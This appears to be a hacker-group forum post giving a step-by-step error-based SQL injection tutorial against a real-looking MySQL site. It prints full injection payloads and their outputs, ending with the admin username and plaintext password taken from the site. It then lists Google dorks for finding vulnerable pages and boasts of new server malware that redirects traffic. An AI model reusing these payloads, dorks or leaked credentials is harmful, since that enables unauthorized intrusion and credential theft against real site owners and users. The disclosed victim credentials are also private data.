~ Starting with the Name of Almighty ALLAH~
Asalam-u-alaikum
================================================================== Note: For Educational Purpose
# First Lets see Simple Injection i mean Lets Use Order by
# Now Use Union and By Using Union we get this Error
(The used SELECT statements have a different number of columns)
# This means We have to use Double Querry or Heavy Querry injection
# Lets Start
1) First Current database name for this Use this Querry
+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# here "Duplicate entry 'ksrmce_ksrmDB1' for key 'group_key'"
2) Now Version Just Change [database()] to [version()]
# "Duplicate entry '5.1.61-cll1' for key 'group_key'"
Note: You Can get Hostname,Datadirectory by Replacing version() with this
# Hostname= @@hostname=Duplicate entry 'cpanel23.interactivedns.com1' for key 'group_key'
# Datadirectory= @@datadir=Duplicate entry '/var/lib/mysql/1' for key 'group_key'
3) Now lets see How many tables are in the Database
+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# "Duplicate entry '~'22'~1' for key 'group_key'" [22 tables]
4)Now lets Get tables from database ;)
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# First Table "Duplicate entry '~'tbl_announcement'~1' for key 'group_key'"
Now Change the Limit just watch Closley change the Limit Where we see
[table_schema=database() LIMIT 2,1] By Changing limits we can get Tables
Note : Sorry i don't have time so I just skip one by one Table
finding
5) Now Lets get Data from Tables
# "tbl_users" Hex it and Follow me ;)
"0x74626c5f7573657273"
+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=database() AND table_name=0x74626c5f7573657273 LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# Column Name = Duplicate entry 'US_ID1' for key 'group_key'[US_ID]
Now Again Change the Limit Where we changed before ^_^
#Duplicate entry 'US_LOGINID1' for key 'group_key'[US_LOGINID]
#Duplicate entry 'US_NAME1' for key 'group_key'[US_NAME]
#Duplicate entry 'US_PASSWORD1' for key 'group_key' [US_PASSWORD]
6) Now the Last Step ;) Get Data from "tbl_users" By Using this
+and+(select 1 FROM(select+count(*),concat((select(us_name) FROM tbl_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
# Username=admin
# UserPass=narayan2bathula1
Author :CyberCode Khorasan [0xCCBF] Thanks to :All Khorasan CyberArmy Member Special to: Cep Engking, JinCorn, An0nym0uZ-17, cliZAceh, Hitcher, CFR, XTreMist, PKShadow, DR. Ninja, DB Bust3r
inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from yahoo
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
dork sql very fast
inurl:totalqueries=0
dork sql very fast
inurl:table_schema=database()--
Hello to All :P
We back after long time with new Malware. This Malware attack on server. Those server who got effective with Malware start to redirect all traffic to some specific site we given in code :P
Soon i post some results here.
That all show for today :)
Regards,
Bye!
